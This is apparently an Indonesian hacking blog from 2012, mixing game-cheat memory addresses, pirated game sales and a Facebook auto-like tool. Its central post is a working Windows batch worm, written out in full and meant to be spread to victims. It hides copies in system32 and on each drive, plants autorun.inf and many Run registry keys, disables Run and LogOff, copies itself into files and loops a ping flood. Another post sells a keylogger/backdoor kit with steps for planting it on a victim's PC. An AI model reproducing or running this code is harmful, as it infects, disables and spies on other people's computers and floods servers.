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by : BTF


0 Simple Hack (V-1) V.6080

10 Mei 2012

Simple Hack (V-1) V.6080

Feature and Hotkey
[-]Perfect All Mode-------------------------F3
[-]Auto Key ON----------------------------F4
[-]Auto Key OFF---------------------------F5
[-]Force To Change Free--------------------F6
[-]Auto Hit CTRL+Auto BR ON/OFF-------F7
[-]Auto Ready ON/OFF---------------------F8
[-]Skip Pin 2 ND----------------------Auto ON
[-]NO Save Mode-----------------------Auto ON
[-]Auto DC jika ada GM----------------Auto ON

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0 ♣¤══¤۩۞۩ஜJual DVD Game Onlineஜ۩۞۩¤══¤♣

8 Mei 2012
♣¤══¤۩۞۩ஜJual DVD Game Onlineஜ۩۞۩¤══¤♣

♣¤══¤۩۞۩ஜDVD Megaxus & Lytoஜ۩۞۩¤══¤♣

►Audition & Grand Chase [Versi April 2012] = Rp. 70.000,-

►Counter Strike Online (CSO) [Versi April 2012] = Rp. 65.000,-

►Lineage 2 Goddess of Destruction [Versi April 2012] = Rp. 65.000,-

►SD Gundam Online Fighter (SDGO) [Versi April] = Rp. 65.000,-

►Anime Fighter & Forsaken World [Versi April 2012] = Rp. 70.000,-

Jika berminat bisa menghubungi :
0857 7537 4882
0838 793 10500
0838 7751 6077

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0 Serangan DDOS dan zombie with notepad

3 Mei 2012

1.Jangan sekali-kali mencoba di komputer sendiri karena zombie ini untuk di komputer victim/korban.
jadi ini harus di sebar ke komputer orang lain agar menjadi wadah zombie ini jalan.

2.Cara kerjanya mudah sekali tinggal di klik zombie jalan.
efek yang bisa di lihat ketika komputer telah shutdown atau logoff

3.ketika komputer hidup dari logoff atau shutdown zombie ini akan menciptakan 2 anakan zombie,1 worm,autorun dan 1 file pendukung untuk me jalankan 2 zombie dan 1 worm.

anakan zombie 1 dengan nama boot.bat
untuk menyerang ip
ip nya bisa di ganti sesuai keinginan anda mau menyerang web apa.

anakan zombie 2 dengan nama 736F686169207761732068657265.bat
berfungis untuk mendownload file server trojan gw
yg bisa di akses di 
jika kalian punya file server trojan sendiri bisa di tambahkan.
teakhir 1 worm untuk penyebaran,dan pertahanan.

Script Code :
::Prompt di baca off::

echo off

::Memberi judul prompt::
title 736F686169207761732068657265

::Memberi warna background hitam dan tulisan hijau muda::
color 0a

::Menghapus layar Prompt::

::Membuat anakan 1 dengan nama wxhshell.vbs :
echo Set wshshell = wscript.CreateObject("WScript.Shell") >>C:\windows\system32\wxhshell.vbs
echo "cmd" >>C:\windows\system32\wxhshell.vbs 
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs 
echo wshshell.sendkeys "echo off " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "color 0a " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Title sohai was here " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "mode 33,10 " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "cls " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::Your" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Computer" >>C:\windows\system32\wxhshell.vbs 
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Is" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Not" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Secure::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::I " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Will" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Attacking" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Your" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Gateway::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo "C:\windows\system32\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\windows\system32\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "D:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "D:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "D:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs

::Membuat anakan Zombie 1 dengan nama boot.bat dan memmiliki fungsi untuk DDOS::
echo echo off >>C:\windows\system32\boot.bat
echo title 0x44444F5320762C736F686169 >>C:\windows\system32\boot.bat
echo mode 67,16 >>C:\windows\system32\boot.bat
echo color 0c >>C:\windows\system32\boot.bat
echo cls >>C:\windows\system32\boot.bat
echo :DDOS >>C:\windows\system32\boot.bat
echo echo Attacking Server >>C:\windows\system32\boot.bat
echo ping -i 100000 -t >nul >>C:\windows\system32\boot.bat
echo goto DDOS >>C:\windows\system32\boot.bat

::Membuat anakan Zombie 2 dengan nama 736F686169207761732068657265.bat tolong bahasa hexa ini JANGAN di ubah::
echo echo off >>C:\windows\system32\736F686169207761732068657265.bat
echo color 0a >>C:\windows\system32\736F686169207761732068657265.bat
echo cls >>C:\windows\system32\736F686169207761732068657265.bat
echo :736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat
::connect ke ripway untuk mendownload file sex.exe::
echo start firefox "" >>C:\windows\system32\736F686169207761732068657265.bat
echo goto 736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat

::Membuat pertahanan untuk worm 7461737961.bat berbentuk folder::

::membuat pertahhanan untuk zombie2 berbentuk folder aux::

::Membuat Worm1 di tambah fungsi manipulasi regedit,dan penyebaran::
echo echo off >>C:\CON\7461737961.bat
echo cls >>C:\CON\7461737961.bat
echo color oa >>C:\CON\7461737961.bat
::Fungsi manipulasi::
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoLogOff" /t REG_BINARY /d 01000000 >>C:\CON\7461737961.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoStartMenuMorePrograms" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat
echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "S.O.H.A.I Was Here" /f >>C:\CON\7461737961.bat
echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Hack by S.O.H.A.I" >>C:\CON\7461737961.bat
echo For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R D":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R E":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R F":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat

::Membuat C:\windows\system32\boot.bat tercopy pada drive C D E F ::
copy "C:\windows\system32\boot.bat" "C:\boot.bat"
copy "C:\windows\system32\boot.bat" "D:\boot.bat"
copy "C:\windows\system32\boot.bat" "E:\boot.bat"
copy "C:\windows\system32\boot.bat" "F:\boot.bat"

::Membuat C:\CON\7461737961.bat tercopy pada folder CON D E F ::
copy "C:\CON\7461737961.bat" "D:\CON\7461737961.bat"
copy "C:\CON\7461737961.bat" "E:\CON\7461737961.bat"
copy "C:\CON\7461737961.bat" "F:\CON\7461737961.bat"

::Membuat C:\CON\7461737961.bat tercopy pada folder aux D E F ::
copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat"

:::membuat C:\windows\system32\736F686169207761732068657265.bat tercopy pada folder C D E F ::
copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat"

::Membuat boot.bat , 736F686169207761732068657265.bat dan 7461737961.bat pada drive C terhidden ::
Attrib +r +h C:\windows\system32\boot.bat
Attrib +r +h C:\windows\system32\736F686169207761732068657265.bat
Attrib +r +h C:\CON\7461737961.bat
Attrib +r +h D:\CON\7461737961.bat
Attrib +r +h E:\CON\7461737961.bat
Attrib +r +h F:\CON\7461737961.bat
Attrib +r +h C:\boot.bat
Attrib +r +h D:\boot.bat
Attrib +r +h E:\boot.bat
Attrib +r +h F:\boot.bat
Attrib +r +h C:\aux\736F686169207761732068657265.bat
Attrib +r +h D:\aux\736F686169207761732068657265.bat
Attrib +r +h E:\aux\736F686169207761732068657265.bat
Attrib +r +h F:\aux\736F686169207761732068657265.bat

::Membuat file autorun.inf di drive C dan memiliki Arti = Virus Membuat File Autorun Agar Virus bisa Berjalan Secara Otomatis::
echo [Autorun] >> C:\autorun.inf
echo shellexecute=boot.bat >> C:\autorun.inf

::Mengcopy salinan autorun.inf pada drive C ke semua drive D E F::
Copy "C:\autorun.inf" "D:\autorun.inf"
Copy "C:\autorun.inf" "E:\autorun.inf"
Copy "C:\autorun.inf" "F:\autorun.inf"

::Membuat file autorun ter hidden dari drive C D E F ::
Attrib +r +h C:\autorun.inf
Attrib +r +h D:\autorun.inf
Attrib +r +h E:\autorun.inf
Attrib +r +h F:\autorun.inf

::Proses auto running file zombie dan worm::
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wxhshell /t REG_SZ /d C:\windows\system32\wxhshell.vbs /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot /t REG_SZ /d C:\windows\system32\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot1 /t REG_SZ /d C:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot2 /t REG_SZ /d D:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot3 /t REG_SZ /d E:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot4 /t REG_SZ /d F:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F686169207761732068657265 /t REG_SZ /d C:\windows\system32\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572651 /t REG_SZ /d C:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572652 /t REG_SZ /d D:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572653 /t REG_SZ /d E:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572654 /t REG_SZ /d F:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 7461737961 /t REG_SZ /d C:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379612 /t REG_SZ /d D:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379613 /t REG_SZ /d E:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379614 /t REG_SZ /d F:\CON\7461737961.bat /f

---------------Tahap pembuatan---------------

Yang di perlukan dalam pembuatan ini adalah

2.salin script ini ke notepad

@echo off
mode 67,16
title DDOS Attack
color 0a
echo DDOS With Batchfile
set /p x=Server-Target:
ping %x%
@ping.exe -n 5 -w 1000 > nul
goto Next
set /p m=ip Host:
set /p n=Packet Size:
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS dengan ekstensi batchfile

----------Cara Pakai----------

1. Pada menu Server-Target masukan
alamat web yang ingin di DDOS

2. disini saya mencoba men DDOS Google,setalah itu
tekan "ENTER" hasil seperti ini

3. kemudian masukan hasil ip dari ping tadi di ip host dan
untuk Packet Size itu untuk mengirim berapa byte jadi
ukuran Size terserah anda

4. ke mudian tekan "ENTER" hasil seperti ini

jika seperti gambar di atas berarti Proses DDOS berhasil di jalankan
tergantung anda ingin men DDOS sampai berapa lama.


1. Saatnya penjelasan source code
[code]@echo off[/code]
[quote]*Menyebabkan perintah tidak ditampilkan ketika dilaksakan/di execute[/quote]

[code]mode 67,16[/code]
[quote]*Membentuk layar pada command prompt dengann ukuran lebar "67" dah tinggi "16"[/quote]

[code]title DDOS Attack[/code]
[quote]*membuat judul dengan nama ""[/quote]

[code]color 0a[/code]
[quote]*membuat layar berwarna,
pada angka 0->untuk membuat background Hitam dan a->untuk membuat tulisan menjadi Hijau Terang[/quote]

[quote]*membersihkan layar sehingga command seperti 

[code]@echo off
mode 67,16
title DDOS Attack
color 0a[/code]
tidak di tampilkan[/quote]

[quote]*akan menampilkan baris kosong[/quote]

[quote]*untuk memberi tanda longkap[/quote]

[quote]* membuat garis lurus[/quote]

echo DDOS With Batchfile

set /p x=Server-Target:
ping %x%
[quote]*artinya hasil dari "Server-Target:" akan di nyatakan x
setelah itu x akan di Ping[/quote]

[code]@ping.exe -n 5 -w 1000 > nul
goto Next[/code]
[quote]*memberi waktu pause sebanyak 5 second dan diteruskan ke Next[/quote]

set /p y=ip Host:
set /p z=Packet Size:
[quote]*setelah ke Next ,
pada "ip Host:" akan di nyatakan y dan "Packet Size:" akan di nyatakan z
setelah itu di teruskan ke DDOS[/quote]

color 0c[/code]
[quote]*membuat warna merah terang[/quote]

[code]echo Attacking Server %y%
ping %y% -i %z% -t >nul
goto DDOS[/code]
[quote]*artinya setelah memasukan nilai y dan nilai z 
hasil nilai y akan di tampung di %y%
dan penge PING an nilai y dan pengiriman size yg di yatakan pada
nilai z setelah berhasil di lanjutkan ke :DDOS
karena mengunakan goto(perulangan)[/quote][/spoiler]

[quote]menyimpulkan dan membuat sebuah script DDOS Yang mengandung malware atau /zombie,....

ok Cekidot liat script nya sebelum nya ane terima kasih dengan bro sohai atas script DDOS nya dan SCript Zombie nya bisa ane kreasikan dan ane edit jadi satu dan ane pentest

[code]@echo off
mode 45,16
title DDOS and Zombie Attack version 1
color 1b
echo //,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//
echo DDOS Server With batchfile and Zombie Version 1
echo //,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//
set /p x=Server-Target:
echo //,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//
echo %x%
echo //,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//,//
@ping.exe -n 5 -w 1000 > nul
goto Next
set /p m=ip Host:
set /p n=Packet Size:
color 0c
echo Attacking Server With Zombie wxhshell.vbs  %m% 
echo Set wshshell = wscript.CreateObject("WScript.Shell") >>C:\windows\system32\wxhshell.vbs
echo "cmd" >>C:\windows\system32\wxhshell.vbs 
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs 
echo wshshell.sendkeys "echo off " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "color 0a " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Title sohai was here " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "mode 33,10 " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "cls " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::Your" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Computer" >>C:\windows\system32\wxhshell.vbs 
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Is" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Not" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Secure::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::I " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Will" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Attacking" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 4000 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Your" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Gateway::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo "C:\windows\system32\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\windows\system32\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\boot.bat" >>C:\windows\system32\wxhshell.vbs    
echo "D:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs    
echo "D:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs    
echo "D:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
goto DDOS[/code] 

save dengan extensi .bat

Read more

1 Full Keylogger

17 Apr 2012

Program Keylogger yg baru keluar ini buatan dari forum saya dan sangat berguna melebihi keylogger lain

Feature :
1. Server Admin
2. Open CD-Rom
3. Show Image
4. Swap Mouse
5. Start Program
6. Msg manager
7. Screendump
8. Get info
9. Play Sound
10. Exit Windows
11. Send Text
12. Active Wnds
13. Mouse Pos
14. Keylogger
15. Sound System
16. Control Mouse
17. Go to URL
18. Pwd manager
19. File manager

Tutor :
1. Extrack duluh tuh winrar
2. Terus Copy ini Program YAng Bernama Pacth Server Ke Komputer Korban
3. kalo udah Pulang kerumah Buka programm yang bernama C3 Pengaturan Kompi Korban
4. masukin ip si korban yang udah loe kasih PActh nya tadi
5. Selesai deh !! Tinggal loe monitoring pake C3 Pengaturan Kompi Korban !! bisa Restart, Shutdown , ngeSS , Keylooger !! Jika File ini terdeteksi Backdoor !! itu sengaja saya simpan !!! agar bisa memonitoring Kompi Korban !! TErimakasih !!

Harga : Rp. 75.000,- [Link Download + Tutor]

NB : Jika berminat bisa hubungi saya lewat Facebook dan bisa PM [Private Message] + NO HP Saya


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0 Promo Dufan

14 Apr 2012


Dalam Rangka Memperingati Hari Bumi, Ancol memberikan Harga Spesial Rekreasi di : Dufan, Atlantis, Samudra

Info Harga Spesial Dufan, Atlantis, Samudra

Dufan :
Weekdays (Senin - Jum'at)
Rp.190.000 = Rp.95.000

Weekend (Sabtu - Minggu)
Rp.220.000 = Rp.110.000

Atlantis :
Weekdays (Senin - Jum'at)
Rp.90.000 = Rp.45.000

Weekend (Sabtu - Minggu)
Rp.110.000 = Rp.55.000

Samudra :
Weekdays (Senin - Jum'at)
Rp.90.000 = Rp.45.000

Weekend (Sabtu - Minggu)
Rp.110.000 = Rp.55.000

Cara Penukaran :
Dengan Menyerahkan Flyer ini ke Loket Dunia Fantasi (DUFAN)/ Atlantis/Samudra anda akan langsung mendapatkan harga spesial ini.

- Periode berlaku 28 Maret - 30 April 2012
- Tidak dapat digabung dengan promo lain
- Berlaku Foto Copy
- 1 Flyer berlaku untuk 1 orang

Jika berminat bisa hubungi saya
CP : 083877516077 / 083879310500
PM = Wall = Comment

Harga :
Rp.15.000/lembar (jarak dekat)
Rp. 25.000/lembar (jarak jauh + pengiriman POS)


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13 Apr 2012
Perfect Normal:

AOB: 7D 3F 33 33 73 3F 9A 99 59 3F 14 AE 47 3F 00 00

Type: 4Byte

Value: On: 0 Off: 858996605

Perfect OTP:

AOB: 3F 1F 85 2B 3F CD CC CC 3E

Type: 4Byte

Value: On: 0 Off: 730144575

Perfect BU:

AOB: 00 00 00 0F 00 00 00 1B 00 00 00 28 00 00 00

Type: 4Byte

Value: On: 9 Off: 251658240

Perfect BR:

AOB: 03 02 01 00 01 02 03 00 01 01 01 01 00 00 00 00

Type: 4Byte

Value: On: 2566980099 Off: 66051

Score Hack:

AOB: 00 00 16 44 00 80 3B 44 00 00 61 44 00 40 83 44 00 00 96 44 00 C0 A8 44 00 00 C8 44 00 40 E7 44 00 40 03 45 00 E0 12 45 00 80 22 45 00 20 32 45 50 C3

Type: Array of Bytes (AOB)


On: 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 80 96 98 4A 50 C3

Off: 00 00 16 44 00 80 3B 44 00 00 61 44 00 40 83 44 00 00 96 44 00 C0 A8 44 00 00 C8 44 00 40 E7 44 00 40 03 45 00 E0 12 45 00 80 22 45 00 20 32 45 50 C3

Reset Battle Party:

AOB: 10 1B 00 00 C1 E9 02 F3 A5 8B C8 33 C0 83 E1 03

Type: 4Byte


Reset normal : 1702

Reset BU : 5744

Reset BeatRush : 11295

Reset Union : 5999

2 Key Arrow:

AOB: 73 63 72 69 70 74 2F B4 ED BD BA 2E 73 6C 6B 00

Type: Text

Value: xcript/´í½º.slk (Harus ada 045.acv)

Peach Emoticon:

AOB: 73 63 72 69 70 74 2F 65 6D 6F 74 69 63 6F 6E

Type: Text

Value: xcript/emoticon.slk (Harus ada 045.acv)

No Sensor Word:

AOB: 73 63 72 69 70 74 2F 73 6C 61 6E 67 2E 73 6C

Type: Text

Value: xcript/slang.slk (Harus ada 045.acv)

Auto Key 1:

AOB : 3B 17 75 36 85 D2 74 32 8B 44 24 0C 48 3B D0 7C

Type : Array Of Bytes (AOB)

Value :

On: 8B 17 89 11 85 D2 74 32 8B 44 24 0C 48 3B D0 7C

Off: 3B 17 75 36 85 D2 74 32 8B 44

Auto Key 2:

AOB : 08 8B 1C 07 3B CB 75 08 46 83 C0 04 3B F2 72 EF

Type : Array Of Bytes (AOB)

Value :

On: 1C 07 89 18 8B 08 90 90 46 83 C0 04 3B F2 72 EF

Off: 08 8B 1C 07 3B CB 75 08 46 83

Score Perfect,Great,Cool,Bad x2 :

AOB : 16 44 00 80 3B 44 00 00 61 44 00 40 83 44 00

Type : Array Of Bytes (AOB)

Value :

On: 96 44 00 80 BB 44 00 00 E1 44 00 40 03 45 00 00 16 45 00 C0 28 45 00 00 48 45 00 80 6D 45 00 40 83 45 00 E0 92 45 00 80 A2 45 00 20 B2

Skip Pin 2nd:

AOB: 01 00 00 00 01 00 00 00 08 00 00 00 FF FF FF

Type: Byte

Value: 0

PF Score Hack:

PF Score 1:

AOB: 40 00 00 00 40 00 00 C0 3F 00 00 80 3F 33 33

Type: Byte

Value: On: 65 Off: 64

PF Score 2:

AOB: 40 00 00 C0 3F 00 00 80 3F 33 33 33 3F 00 00

Type: Byte

Value: On: 65 Off: 64

Time Hack:

AOB: 73 63 72 69 70 74 2F C0 BD BE C7 2E 73 6C 6B

Type: Text

Value: zcript/À½¾Ç.slk (Harus ada 045.acv)

Hidden Song:

AOB: 73 63 72 69 70 74 2F C0 BD BE C7 2E 73 6C 6B

Typr: Text

Value: xcript/À½¾Ç.slk (Harus ada 045.acv)

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0 Tips & Trick Cara Membuat Cheat Audition Ayodance

Karna Banyak Orang Di sini PM ke Gw,,!!

"Gimana Cara Membuat Cheat Ayodance"

Mumpung Bulan Penuh Berkah, Gw Bagi Ilmu Gimana Cara membuat Trainer ayodance PF On,,,!!


-Cheat Engine Versi apa aja ( Gw pake V 5.6.1 )
-Es Buah
-Sebungkus Rokok
-Addres Klik Disini
Langkah Awal :

1:Masuk Ke Ayodance Lalu Buat Room
Tekan ALT + TAB lalu Keluar Notice Jng Di klik OK nya, pahan kan
2:Buka CE dan Klik Process List lalu pilih Audition.exe lalu OPEN
3:Klik Add Address Manually
4:Masukan Address PF Normal (Audition.exe+4FB432 ) pilih Type BYTE lalu klik OK
5:Klik Advanced Options
6:Klik Gambar DISKET lalu OK
7:Akan Muncul jendela TRAINER MAKER
8:Pilih ADD ENTRY > Add
9:Masukan Valuenya ON ( Valuenya = 0 ) lalu Add

10:Masukan HOTKEY nya Contoh : F3 Lalu Ok

11:Isikan PROCESS LIST dengan Audition.exe CENTANG PREVENT RE-
12:Isikan titile sesuka Anda Contoh : Musang PF Hack
13:Lalu Simpan Dengan nama yg anda inginkan
Untuk Icon dan yg lain-lain kalian Buat Dengan Creativitas anda sendiri yeh....

ini Langkah Awal Loh Buat kalian yg ingin Buat Cheat Sendiri

NB : Biar cheatnya Work,,, sebyum Mengunakan Cheat,, mattin dulo EagleNT nya

Dan 1 lagi... Reputasi Ane Harus Bertambah yeh,,,!!

Created By: Musang Doank

Setelah cheat udah jadi, Di Matiin Dulo Tuh EagleNT nya

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0 Generator Auto LIKE + COMMENT

7 Apr 2012
Saya Memberitahu Kepada Kalian Tentang Generator Auto LIKE + COMMENT

Feature :
Action Type :
-Auto Comment
-Friend Mention
-Auto Friend Confirm

Target :
-Wall Posting
-Group Posting
-Relationship Sts

Timer :
Interval 1 Minute - 5 Minute

Jika berminat bisa hubungi saya lewat

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0 Kill All Boss Hunting Easter Bunny Egg

5 Apr 2012

saya share cheat Kill All Boss Hunting Easter Bunny Egg buat agan sekalian semoga bisa berguna dan bermanfaat Senang Senang Senang

Tools :
-Fiddler (google)
-SWF (cari sampe ketemuMantap

Tutorial :
-Buka akun FB kalian
-Buka Fiddler
-Buka SWF
-Drag SWF ke Fiddler
-Clear Chace
-Buka dan login NS kalian
-Go to Shop
-Happy Cheating

NB : Link saya hide biar leecher gak asal sedot Sombong dan file dipakai password Cuek

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